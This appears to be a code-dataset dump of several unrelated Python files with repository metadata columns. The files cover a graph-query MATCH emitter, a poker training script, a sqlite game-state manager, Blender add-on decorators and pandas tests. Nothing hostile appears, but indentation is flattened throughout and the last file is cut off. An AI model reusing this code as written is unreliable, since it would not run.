| null | null | null | """Convert lowered IR basic blocks to MATCH query strings."""
from collections import deque
import six
from .blocks import Filter, MarkLocation, QueryRoot, Recurse, Traverse
from .expressions import TrueLiteral
from .helpers import get_only_element_from_collection, validate_safe_string
def _get_vertex_location_name(location):
"""Get the location name from a location that is expected to point to a vertex."""
mark_name, field_name = location.get_location_name()
if field_name is not None:
raise AssertionError(u"Location unexpectedly pointed to a field: {}".format(location))
return mark_name
def _first_step_to_match(match_step):
"""Transform the very first MATCH step into a MATCH query string."""
parts = []
if match_step.root_block is not None:
if not isinstance(match_step.root_block, QueryRoot):
raise AssertionError(u"Expected None or QueryRoot root block, received: " u"{} {}".format(match_step.root_block, match_step))
match_step.root_block.validate()
start_class = get_only_element_from_collection(match_step.root_block.start_class)
parts.append(u"class: %s" % (start_class,))
if match_step.coerce_type_block is not None:
raise AssertionError(u"Invalid MATCH step: {}".format(match_step))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if match_step.as_block is None:
raise AssertionError(u"Found a MATCH step without a corresponding Location. " u"This should never happen: {}".format(match_step))
else:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"{{ %s }}" % (u", ".join(parts),)
def _subsequent_step_to_match(match_step):
"""Transform any subsequent (non-first) MATCH step into a MATCH query string."""
if not isinstance(match_step.root_block, (Traverse, Recurse)):
raise AssertionError(u"Expected Traverse root block, received: " u"{} {}".format(match_step.root_block, match_step))
is_recursing = isinstance(match_step.root_block, Recurse)
match_step.root_block.validate()
traversal_command = u".%s('%s')" % (match_step.root_block.direction, match_step.root_block.edge_name)
parts = []
if match_step.coerce_type_block:
coerce_type_set = match_step.coerce_type_block.target_class
if len(coerce_type_set) != 1:
raise AssertionError(u"Found MATCH type coercion block with more than one target class:" u" {} {}".format(coerce_type_set, match_step))
coerce_type_target = list(coerce_type_set)[0]
parts.append(u"class: %s" % (coerce_type_target,))
if is_recursing:
parts.append(u"while: ($depth < %d)" % (match_step.root_block.depth,))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if not is_recursing and match_step.root_block.optional:
parts.append(u"optional: true")
if match_step.as_block:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"%s {{ %s }}" % (traversal_command, u", ".join(parts))
def _represent_match_traversal(match_traversal):
"""Emit MATCH query code for an entire MATCH traversal sequence."""
output = []
output.append(_first_step_to_match(match_traversal[0]))
for step in match_traversal[1:]:
output.append(_subsequent_step_to_match(step))
return u"".join(output)
def _represent_fold(fold_location, fold_ir_blocks):
"""Emit a LET clause corresponding to the IR blocks for a @fold scope."""
start_let_template = u"$%(mark_name)s = %(base_location)s"
traverse_edge_template = u'.%(direction)s("%(edge_name)s")'
base_template = start_let_template + traverse_edge_template
edge_direction, edge_name = fold_location.get_first_folded_edge()
mark_name, _ = fold_location.get_location_name()
base_location_name, _ = fold_location.base_location.get_location_name()
validate_safe_string(mark_name)
validate_safe_string(base_location_name)
validate_safe_string(edge_direction)
validate_safe_string(edge_name)
template_data = {"mark_name": mark_name, "base_location": base_location_name, "direction": edge_direction, "edge_name": edge_name}
final_string = base_template % template_data
for block in fold_ir_blocks:
if isinstance(block, Filter):
final_string += u"[" + block.predicate.to_match() + u"]"
elif isinstance(block, Traverse):
template_data = {"direction": block.direction, "edge_name": block.edge_name}
final_string += traverse_edge_template % template_data
elif isinstance(block, MarkLocation):
pass
else:
raise AssertionError(u"Found an unexpected IR block in the folded IR blocks: " u"{} {} {}".format(type(block), block, fold_ir_blocks))
final_string += ".asList()"
return final_string
def _construct_output_to_match(output_block):
"""Transform a ConstructResult block into a MATCH query string."""
output_block.validate()
selections = (u"%s AS `%s`" % (output_block.fields[key].to_match(), key) for key in sorted(output_block.fields.keys()))
return u"SELECT %s FROM" % (u", ".join(selections),)
def _construct_where_to_match(where_block):
"""Transform a Filter block into a MATCH query string."""
if where_block.predicate == TrueLiteral:
raise AssertionError(u"Received WHERE block with TrueLiteral predicate: {}".format(where_block))
return u"WHERE " + where_block.predicate.to_match()
def emit_code_from_single_match_query(match_query):
"""Return a MATCH query string from a list of IR blocks."""
query_data = deque([u"MATCH "])
if not match_query.match_traversals:
raise AssertionError(u"Unexpected falsy value for match_query.match_traversals received: " u"{} {}".format(match_query.match_traversals, match_query))
match_traversal_data = [_represent_match_traversal(x) for x in match_query.match_traversals]
query_data.append(match_traversal_data[0])
for traversal_data in match_traversal_data[1:]:
query_data.append(u", ")
query_data.append(traversal_data)
query_data.appendleft(u" (")
query_data.append(u"RETURN $matches)")
fold_data = sorted([_represent_fold(fold_location, fold_ir_blocks) for fold_location, fold_ir_blocks in six.iteritems(match_query.folds)])
if fold_data:
query_data.append(u" LET ")
query_data.append(fold_data[0])
for fold_clause in fold_data[1:]:
query_data.append(u", ")
query_data.append(fold_clause)
query_data.appendleft(_construct_output_to_match(match_query.output_block))
if match_query.where_block is not None:
query_data.append(_construct_where_to_match(match_query.where_block))
return u" ".join(query_data)
def emit_code_from_multiple_match_queries(match_queries):
"""Return a MATCH query string from a list of MatchQuery namedtuples."""
optional_variable_base_name = "$optional__"
union_variable_name = "$result"
query_data = deque([u"SELECT EXPAND(", union_variable_name, u")", u" LET "])
optional_variables = []
sub_queries = [emit_code_from_single_match_query(match_query) for match_query in match_queries]
for (i, sub_query) in enumerate(sub_queries):
variable_name = optional_variable_base_name + str(i)
variable_assignment = variable_name + u" = ("
sub_query_end = u"),"
query_data.append(variable_assignment)
query_data.append(sub_query)
query_data.append(sub_query_end)
optional_variables.append(variable_name)
query_data.append(union_variable_name)
query_data.append(u" = UNIONALL(")
query_data.append(u", ".join(optional_variables))
query_data.append(u")")
return u" ".join(query_data)
def emit_code_from_ir(schema_info, compound_match_query):
"""Return a MATCH query string from a CompoundMatchQuery."""
match_queries = compound_match_query.match_queries
if len(match_queries) == 1:
query_string = emit_code_from_single_match_query(match_queries[0])
elif len(match_queries) > 1:
query_string = emit_code_from_multiple_match_queries(match_queries)
else:
raise AssertionError(u"Received CompoundMatchQuery with an empty list of MatchQueries: " u"{}".format(match_queries))
return query_string | 52.411765 | 152 | 0.775907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,872 | 0.233446 |
c794ff339d897246d1f9ee7d50c25c7781c1ee06 | 3,286 | py | Python | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
]
| null | null | null | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
]
| null | null | null | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
]
| null | null | null | from PokerRL.game.games import StandardLeduc
from PokerRL.game.games import BigLeduc
from PokerRL.eval.rl_br.RLBRArgs import RLBRArgs
from PokerRL.eval.lbr.LBRArgs import LBRArgs
from PokerRL.game.bet_sets import POT_ONLY
from DeepCFR.EvalAgentDeepCFR import EvalAgentDeepCFR
from DeepCFR.TrainingProfile import TrainingProfile
from DeepCFR.workers.driver.Driver import Driver
import pdb
if __name__ == '__main__':
ctrl = Driver(t_prof=TrainingProfile(name="MO_LEDUC_BigLeduc_LBR",
nn_type="feedforward",
eval_agent_export_freq=3,
checkpoint_freq=3,
n_learner_actor_workers=5,
max_buffer_size_adv=1e6,
n_traversals_per_iter=500,
n_batches_adv_training=250,
mini_batch_size_adv=2048,
game_cls=BigLeduc,
n_units_final_adv=64,
n_merge_and_table_layer_units_adv=64,
init_adv_model="random", # warm start neural weights with init from last iter
use_pre_layers_adv=False, # shallower nets
use_pre_layers_avrg=False, # shallower nets
# You can specify one or both modes. Choosing both is useful to compare them.
eval_modes_of_algo=(
EvalAgentDeepCFR.EVAL_MODE_SINGLE, # SD-CFR
),
DISTRIBUTED=True,
log_verbose=True,
rl_br_args=RLBRArgs(rlbr_bet_set=None,
n_hands_each_seat=200,
n_workers=1,
# Training
DISTRIBUTED=False,
n_iterations=100,
play_n_games_per_iter=50,
# The DDQN
batch_size=512,
),
lbr_args=LBRArgs(n_lbr_hands_per_seat=30000,
n_parallel_lbr_workers=10,
DISTRIBUTED=True,
),
),
eval_methods={'br': 1,
#'rlbr': 1,
'lbr': 1,
},
n_iterations=12)
ctrl.run()
pdb.set_trace()
| 54.766667 | 119 | 0.370663 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 263 | 0.080037 |
c7964aa0abe4f31ae2f01cae5205b2c444d9f154 | 8,436 | py | Python | geocircles/backend/gamestate.py | tmick0/geocircles | 12845d006eeb0a4032679209a953c1cb072d06d7 | [
"MIT"
]
| null | null | null | geocircles/backend/gamestate.py | tmick0/geocircles | 12845d006eeb0a4032679209a953c1cb072d06d7 | [
"MIT"
]
| null | null | null | geocircles/backend/gamestate.py | tmick0/geocircles | 12845d006eeb0a4032679209a953c1cb072d06d7 | [
"MIT"
]
| null | null | null | import sqlite3
from enum import Enum
import random
__all__ = ['state_mgr', 'game_state', 'next_state']
class game_state (Enum):
NEW_GAME = 0
WAITING_FOR_HOST = 1
HOST_CHOOSING = 2
GUEST_GUESSING = 3
GUEST_CHOOSING = 4
HOST_GUESSING = 5
def next_state(s):
if s == game_state.WAITING_FOR_HOST.value:
return game_state.GUEST_CHOOSING.value
elif s == game_state.GUEST_CHOOSING.value:
return game_state.HOST_GUESSING.value
elif s == game_state.HOST_CHOOSING.value:
return game_state.GUEST_GUESSING.value
elif s == game_state.GUEST_GUESSING.value:
return game_state.GUEST_CHOOSING.value
elif s == game_state.HOST_GUESSING.value:
return game_state.HOST_CHOOSING.value
class state_mgr (object):
def __init__(self, path):
self.db = sqlite3.connect(path)
cur = self.db.cursor()
cur.execute('''
create table if not exists game (
game_id integer primary key,
state integer default {:d}
)
'''.format(game_state.NEW_GAME.value))
cur.execute('''
create table if not exists session (
session_id integer primary key,
game_id integer not null references game (game_id),
position integer not null,
display_name text not null
)
''')
cur.execute('''
create table if not exists challenge (
challenge_id integer primary key autoincrement,
game_id integer not null references game (game_id),
lat real not null,
lon real not null,
pano text not null,
heading real not null,
pitch real not null,
zoom real not null,
guesses int not null,
radius int not null
)
''')
cur.execute('''
create table if not exists guess (
guess_id integer primary key autoincrement,
challenge_id integer not null references challenge (challenge_id),
lat real not null,
lon real not null,
radius real not null,
good integer not null
)
''')
cur.execute('''
create table if not exists rules (
game_id integer primary key not null references game (game_id),
max_circle integer not null,
min_circle integer not null,
num_circles integer not null,
num_guesses integer not null,
difficulty text not null
)
''')
self.db.commit()
def create_game(self, display_name):
game = random.getrandbits(16)
session = random.getrandbits(32)
cur = self.db.cursor()
cur.execute('insert into game (game_id) values (?)', [game])
cur.execute('insert into session (session_id, game_id, position, display_name) values (?, ?, ?, ?)', [
session, game, 0, display_name])
self.db.commit()
return game, session
def join_game(self, game, display_name):
session = random.getrandbits(32)
cur = self.db.cursor()
cur.execute('insert into session (session_id, game_id, position, display_name) values (?, ?, ?, ?)', [
session, game, 1, display_name])
cur.execute('update game set state = ? where game_id = ?',
[game_state.WAITING_FOR_HOST.value, game])
self.db.commit()
return session
def set_rules(self, game, rules):
cur = self.db.cursor()
cur.execute('''
insert into rules (game_id, max_circle, min_circle, num_circles, num_guesses, difficulty)
values (?, ?, ?, ?, ?, ?)
''', [game, rules['start_size'], rules['end_size'], rules['num_circles'], rules['num_guesses'], rules['difficulty']])
self.db.commit()
def get_rules(self, game):
cur = self.db.cursor()
cur.execute('''
select max_circle, min_circle, num_circles, num_guesses, difficulty from rules where game_id = ?
''', [game])
start_size, end_size, num_circles, num_guesses, difficulty = cur.fetchone()
return {
'start_size': start_size,
'end_size': end_size,
'num_circles': num_circles,
'num_guesses': num_guesses,
'difficulty': difficulty
}
def resume_session(self, session):
cur = self.db.cursor()
cur.execute(
'select game.game_id, state, position, display_name from session left join game on session.game_id = game.game_id where session_id = ?', [session])
return cur.fetchone()
def get_host_session(self, session):
cur = self.db.cursor()
cur.execute('''
select game.game_id, host.session_id from
session as guest
left join game on guest.game_id = game.game_id
left join session as host on host.game_id = game.game_id
where guest.session_id = ? and host.position = 0
''', [session])
return cur.fetchone()
def get_guest_session(self, session):
cur = self.db.cursor()
cur.execute('''
select game.game_id, guest.session_id from
session as host
left join game on host.game_id = game.game_id
left join session as guest on guest.game_id = game.game_id
where host.session_id = ? and guest.position = 1
''', [session])
return cur.fetchone()
def get_session_info(self, session):
cur = self.db.cursor()
cur.execute(
'select game.game_id, game.state, session.position from session left join game on session.game_id = game.game_id where session_id = ?', [session])
return cur.fetchone()
def get_game_sessions(self, game):
cur = self.db.cursor()
cur.execute(
'select session_id from session where game_id = ? order by position asc', [game])
return [sid for (sid,) in cur.fetchall()]
def set_state(self, game, state):
cur = self.db.cursor()
cur.execute('update game set state = ? where game_id = ?',
[state, game])
self.db.commit()
def set_challenge(self, game, lat, lon, pano, heading, pitch, zoom, guesses, radius):
cur = self.db.cursor()
cur.execute('insert into challenge (game_id, lat, lon, pano, heading, pitch, zoom, guesses, radius) values (?, ?, ?, ?, ?, ?, ?, ?, ?)', [
game, lat, lon, pano, heading, pitch, zoom, guesses, radius])
self.db.commit()
def update_challenge(self, game, guesses, radius):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute('update challenge set guesses = ?, radius = ? where challenge_id = ?', [
guesses, radius, challenge])
self.db.commit()
def get_challenge(self, game):
cur = self.db.cursor()
cur.execute(
'select lat, lon, pano, heading, pitch, zoom, guesses, radius from challenge where game_id = ? order by challenge_id desc', [game])
return cur.fetchone()
def set_guess(self, game, lat, lon, radius, good):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute('insert into guess (challenge_id, lat, lon, radius, good) values (?, ?, ?, ?, ?)', [
challenge, lat, lon, radius, good])
self.db.commit()
def get_guesses(self, game):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute(
'select lat, lon, radius, good from guess where challenge_id = ? order by guess_id asc', [challenge])
res = []
for lat, lon, radius, good in cur.fetchall():
res.append({
'lat': lat,
'lon': lon,
'radius': radius,
'good': good
})
return res
def close(self):
self.db.close()
self.db = None
| 36.838428 | 159 | 0.580844 | 7,839 | 0.929232 | 0 | 0 | 0 | 0 | 0 | 0 | 3,965 | 0.470009 |
c79748fa89a41d17ad6e31fcee8a32474231a1c4 | 27 | py | Python | tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 541131e33858ee1b8b5a7590d2bb9f929740ea1e | [
"BSD-3-Clause"
]
| null | null | null | tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 541131e33858ee1b8b5a7590d2bb9f929740ea1e | [
"BSD-3-Clause"
]
| null | null | null | tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 541131e33858ee1b8b5a7590d2bb9f929740ea1e | [
"BSD-3-Clause"
]
| null | null | null | """Tests for callables."""
| 13.5 | 26 | 0.62963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 26 | 0.962963 |
c799f39a2d11cd8cf47042ccb70ce866c8193b11 | 191 | py | Python | dss/dss_capi_gr/__init__.py | dss-extensions/dss_python | f6c4440a14287d06f1bd10180484b349f764ba7e | [
"BSD-3-Clause"
]
| 24 | 2019-03-07T20:24:24.000Z | 2022-03-23T17:58:00.000Z | dss/dss_capi_gr/__init__.py | dss-extensions/dss_python | f6c4440a14287d06f1bd10180484b349f764ba7e | [
"BSD-3-Clause"
]
| 32 | 2019-02-14T03:46:31.000Z | 2022-03-23T00:01:28.000Z | dss/dss_capi_ir/__init__.py | PMeira/dss_python | 2dbc72ed875108d3f98d21cb0a488bab6b0d7f4c | [
"BSD-3-Clause"
]
| 5 | 2019-02-19T04:54:49.000Z | 2022-03-23T10:40:51.000Z | '''
A compatibility layer for DSS C-API that mimics the official OpenDSS COM interface.
Copyright (c) 2016-2019 Paulo Meira
'''
from __future__ import absolute_import
from .IDSS import IDSS
| 23.875 | 83 | 0.78534 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 128 | 0.670157 |
c79a2fb3f10def9e365b5ba6af795f7018c3bbe1 | 693 | py | Python | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
]
| null | null | null | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
]
| null | null | null | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
]
| null | null | null | from .component import Component, using_scope
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
class EmbeddingLayer(Component):
def __init__(self, input_size, output_size, name='embedding'):
Component.__init__(self, name=name)
self.input_size = input_size
self.output_size = output_size
with self.use_scope():
self.embedding_matrix = tf.get_variable(
'embedding_matrix', shape=[self.input_size, self.output_size])
self._built = True
@using_scope
def embed(self, x):
return tf.nn.embedding_lookup(self.embedding_matrix, x)
def __call__(self, inputs):
return self.embed(inputs)
| 27.72 | 78 | 0.681097 | 585 | 0.844156 | 0 | 0 | 100 | 0.1443 | 0 | 0 | 29 | 0.041847 |
c79bb693d6ca4d67f78e8585c83eae0b233a16e3 | 76 | py | Python | hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 0abefb9e7def7762e829ac4d621519d9d01592c0 | [
"MIT"
]
| 1 | 2021-12-09T04:27:33.000Z | 2021-12-09T04:27:33.000Z | hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 0abefb9e7def7762e829ac4d621519d9d01592c0 | [
"MIT"
]
| 2 | 2021-12-09T08:47:12.000Z | 2022-03-25T16:07:56.000Z | hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 0abefb9e7def7762e829ac4d621519d9d01592c0 | [
"MIT"
]
| 1 | 2022-03-23T13:53:54.000Z | 2022-03-23T13:53:54.000Z | from hydrocarbon_problem.env.types_ import Observation, Done, Stream, Column | 76 | 76 | 0.855263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
c79c07c8078e5f1d72628e2e7fc0c80e75f6489c | 12,955 | py | Python | addon_common/common/decorators.py | Unnoen/retopoflow | 73c7cfc10a0b58937198d60e308ba5248b446490 | [
"OML"
]
| 1 | 2022-01-10T23:40:21.000Z | 2022-01-10T23:40:21.000Z | addon_common/common/decorators.py | Unnoen/retopoflow | 73c7cfc10a0b58937198d60e308ba5248b446490 | [
"OML"
]
| null | null | null | addon_common/common/decorators.py | Unnoen/retopoflow | 73c7cfc10a0b58937198d60e308ba5248b446490 | [
"OML"
]
| null | null | null | '''
Copyright (C) 2021 CG Cookie
http://cgcookie.com
[email protected]
Created by Jonathan Denning, Jonathan Williamson
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
import re
import json
import time
import inspect
from functools import wraps
import bpy
debug_run_test_calls = False
def debug_test_call(*args, **kwargs):
def wrapper(fn):
if debug_run_test_calls:
ret = str(fn(*args,*kwargs))
print('TEST: %s()' % fn.__name__)
if args:
print(' arg:', args)
if kwargs:
print(' kwa:', kwargs)
print(' ret:', ret)
return fn
return wrapper
def stats_wrapper(fn):
return fn
if not hasattr(stats_report, 'stats'):
stats_report.stats = dict()
frame = inspect.currentframe().f_back
f_locals = frame.f_locals
filename = os.path.basename(frame.f_code.co_filename)
clsname = f_locals['__qualname__'] if '__qualname__' in f_locals else ''
linenum = frame.f_lineno
fnname = fn.__name__
key = '%s%s (%s:%d)' % (
clsname + ('.' if clsname else ''),
fnname, filename, linenum
)
stats = stats_report.stats
stats[key] = {
'filename': filename,
'clsname': clsname,
'linenum': linenum,
'fileline': '%s:%d' % (filename, linenum),
'fnname': fnname,
'count': 0,
'total time': 0,
'average time': 0,
}
def wrapped(*args, **kwargs):
time_beg = time.time()
ret = fn(*args, **kwargs)
time_end = time.time()
time_delta = time_end - time_beg
d = stats[key]
d['count'] += 1
d['total time'] += time_delta
d['average time'] = d['total time'] / d['count']
return ret
return wrapped
def stats_report():
return
stats = stats_report.stats if hasattr(stats_report, 'stats') else dict()
l = max(len(k) for k in stats)
def fmt(s):
return s + ' ' * (l - len(s))
print()
print('Call Statistics Report')
cols = [
('class', 'clsname', '%s'),
('func', 'fnname', '%s'),
('location', 'fileline', '%s'),
# ('line','linenum','% 10d'),
('count', 'count', '% 8d'),
('total (sec)', 'total time', '% 10.4f'),
('avg (sec)', 'average time', '% 10.6f'),
]
data = [stats[k] for k in sorted(stats)]
data = [[h] + [f % row[c] for row in data] for (h, c, f) in cols]
colwidths = [max(len(d) for d in col) for col in data]
totwidth = sum(colwidths) + len(colwidths) - 1
def rpad(s, l):
return '%s%s' % (s, ' ' * (l - len(s)))
def printrow(i_row):
row = [col[i_row] for col in data]
print(' '.join(rpad(d, w) for (d, w) in zip(row, colwidths)))
printrow(0)
print('-' * totwidth)
for i in range(1, len(data[0])):
printrow(i)
def add_cache(attr, default):
def wrapper(fn):
setattr(fn, attr, default)
return fn
return wrapper
class LimitRecursion:
def __init__(self, count, def_ret):
self.count = count
self.def_ret = def_ret
self.calls = 0
def __call__(self, fn):
def wrapped(*args, **kwargs):
ret = self.def_ret
if self.calls < self.count:
try:
self.calls += 1
ret = fn(*args, **kwargs)
finally:
self.calls -= 1
return ret
return wrapped
@add_cache('data', {'nested':0, 'last':None})
def timed_call(label):
def wrapper(fn):
def wrapped(*args, **kwargs):
data = timed_call.data
if data['last']: print(data['last'])
data['last'] = f'''{" " * data['nested']}Timing {label}'''
data['nested'] += 1
time_beg = time.time()
ret = fn(*args, **kwargs)
time_end = time.time()
time_delta = time_end - time_beg
if data['last']:
print(f'''{data['last']}: {time_delta:0.4f}s''')
data['last'] = None
else:
print(f'''{" " * data['nested']}{time_delta:0.4f}s''')
data['nested'] -= 1
return ret
return wrapped
return wrapper
# corrected bug in previous version of blender_version fn wrapper
# https://github.com/CGCookie/retopoflow/commit/135746c7b4ee0052ad0c1842084b9ab983726b33#diff-d4260a97dcac93f76328dfaeb5c87688
def blender_version_wrapper(op, ver):
self = blender_version_wrapper
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = fns = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
update_fn = self.ops[op](ver)
def wrapit(fn):
nonlocal self, update_fn
fn_name = fn.__name__
fns = self.fns
error_msg = "Could not find appropriate function named %s for version Blender %s" % (fn_name, self.blenderver)
if update_fn: fns[fn_name] = fn
def callit(*args, **kwargs):
nonlocal fns, fn_name, error_msg
fn = fns.get(fn_name, None)
assert fn, error_msg
ret = fn(*args, **kwargs)
return ret
return callit
return wrapit
def only_in_blender_version(*args, ignore_others=False, ignore_return=None):
self = only_in_blender_version
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = {}
self.ignores = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
self.re_blender_version = re.compile(r'^(?P<comparison><|<=|==|!=|>=|>) *(?P<version>\d\.\d\d)$')
matches = [self.re_blender_version.match(arg) for arg in args]
assert all(match is not None for match in matches), f'At least one arg did not match version comparison: {args}'
results = [self.ops[match.group('comparison')](match.group('version')) for match in matches]
version_matches = all(results)
def wrapit(fn):
fn_name = fn.__name__
if version_matches:
assert fn_name not in self.fns, f'Multiple functions {fn_name} match the Blender version {self.blenderver}'
self.fns[fn_name] = fn
if ignore_others and fn_name not in self.ignores:
self.ignores[fn_name] = ignore_return
@wraps(fn)
def callit(*args, **kwargs):
fn = self.fns.get(fn_name, None)
if fn_name not in self.ignores:
assert fn, f'Could not find appropriate function named {fn_name} for version Blender version {self.blenderver}'
elif fn is None:
return self.ignores[fn_name]
return fn(*args, **kwargs)
return callit
return wrapit
def warn_once(warning):
def wrapper(fn):
nonlocal warning
@wraps(fn)
def wrapped(*args, **kwargs):
nonlocal warning
if warning:
print(warning)
warning = None
return fn(*args, **kwargs)
return wrapped
return wrapper
class PersistentOptions:
class WrappedDict:
def __init__(self, cls, filename, version, defaults, update_external):
self._dirty = False
self._last_save = time.time()
self._write_delay = 2.0
self._defaults = defaults
self._update_external = update_external
self._defaults['persistent options version'] = version
self._dict = {}
if filename:
src = inspect.getsourcefile(cls)
path = os.path.split(os.path.abspath(src))[0]
self._fndb = os.path.join(path, filename)
else:
self._fndb = None
self.read()
if self._dict.get('persistent options version', None) != version:
self.reset()
self.update_external()
def update_external(self):
upd = self._update_external
if upd:
upd()
def dirty(self):
self._dirty = True
self.update_external()
def clean(self, force=False):
if not force:
if not self._dirty:
return
if time.time() < self._last_save + self._write_delay:
return
if self._fndb:
json.dump(self._dict, open(self._fndb, 'wt'), indent=2, sort_keys=True)
self._dirty = False
self._last_save = time.time()
def read(self):
self._dict = {}
if self._fndb and os.path.exists(self._fndb):
try:
self._dict = json.load(open(self._fndb, 'rt'))
except Exception as e:
print('Exception caught while trying to read options from "%s"' % self._fndb)
print(str(e))
for k in set(self._dict.keys()) - set(self._defaults.keys()):
print('Deleting extraneous key "%s" from options' % k)
del self._dict[k]
self.update_external()
self._dirty = False
def keys(self):
return self._defaults.keys()
def reset(self):
keys = list(self._dict.keys())
for k in keys:
del self._dict[k]
self._dict['persistent options version'] = self['persistent options version']
self.dirty()
self.clean()
def __getitem__(self, key):
return self._dict[key] if key in self._dict else self._defaults[key]
def __setitem__(self, key, val):
assert key in self._defaults, 'Attempting to write "%s":"%s" to options, but key does not exist in defaults' % (str(key), str(val))
if self[key] == val: return
self._dict[key] = val
self.dirty()
self.clean()
def gettersetter(self, key, fn_get_wrap=None, fn_set_wrap=None):
if not fn_get_wrap: fn_get_wrap = lambda v: v
if not fn_set_wrap: fn_set_wrap = lambda v: v
oself = self
class GetSet:
def get(self):
return fn_get_wrap(oself[key])
def set(self, v):
v = fn_set_wrap(v)
if oself[key] != v:
oself[key] = v
return GetSet()
def __init__(self, filename=None, version=None):
self._filename = filename
self._version = version
self._db = None
def __call__(self, cls):
upd = getattr(cls, 'update', None)
if upd:
u = upd
def wrap():
def upd_wrap(*args, **kwargs):
u(None)
return upd_wrap
upd = wrap()
self._db = PersistentOptions.WrappedDict(cls, self._filename, self._version, cls.defaults, upd)
db = self._db
class WrappedClass:
def __init__(self, *args, **kwargs):
self._db = db
self._def = cls.defaults
def __getitem__(self, key):
return self._db[key]
def __setitem__(self, key, val):
self._db[key] = val
def keys(self):
return self._db.keys()
def reset(self):
self._db.reset()
def clean(self):
self._db.clean()
def gettersetter(self, key, fn_get_wrap=None, fn_set_wrap=None):
return self._db.gettersetter(key, fn_get_wrap=fn_get_wrap, fn_set_wrap=fn_set_wrap)
return WrappedClass
| 33.475452 | 143 | 0.542802 | 5,070 | 0.391355 | 0 | 0 | 1,364 | 0.105288 | 0 | 0 | 2,388 | 0.18433 |
c79d02fd3237e472a6910ab89fe822c176242e9f | 11,414 | py | Python | venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
]
| 28,899 | 2016-10-13T03:32:12.000Z | 2022-03-31T21:39:05.000Z | venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
]
| 31,004 | 2016-10-12T23:22:27.000Z | 2022-03-31T23:17:38.000Z | venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
]
| 15,149 | 2016-10-13T03:21:31.000Z | 2022-03-31T18:46:47.000Z | import numpy as np
import pytest
from pandas import (
DataFrame,
Series,
concat,
)
import pandas._testing as tm
@pytest.mark.parametrize("func", ["cov", "corr"])
def test_ewm_pairwise_cov_corr(func, frame):
result = getattr(frame.ewm(span=10, min_periods=5), func)()
result = result.loc[(slice(None), 1), 5]
result.index = result.index.droplevel(1)
expected = getattr(frame[1].ewm(span=10, min_periods=5), func)(frame[5])
tm.assert_series_equal(result, expected, check_names=False)
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov(name):
A = Series(np.random.randn(50), index=np.arange(50))
B = A[2:] + np.random.randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = getattr(A.ewm(com=20, min_periods=5), name)(B)
assert np.isnan(result.values[:14]).all()
assert not np.isnan(result.values[14:]).any()
@pytest.mark.parametrize("min_periods", [0, 1, 2])
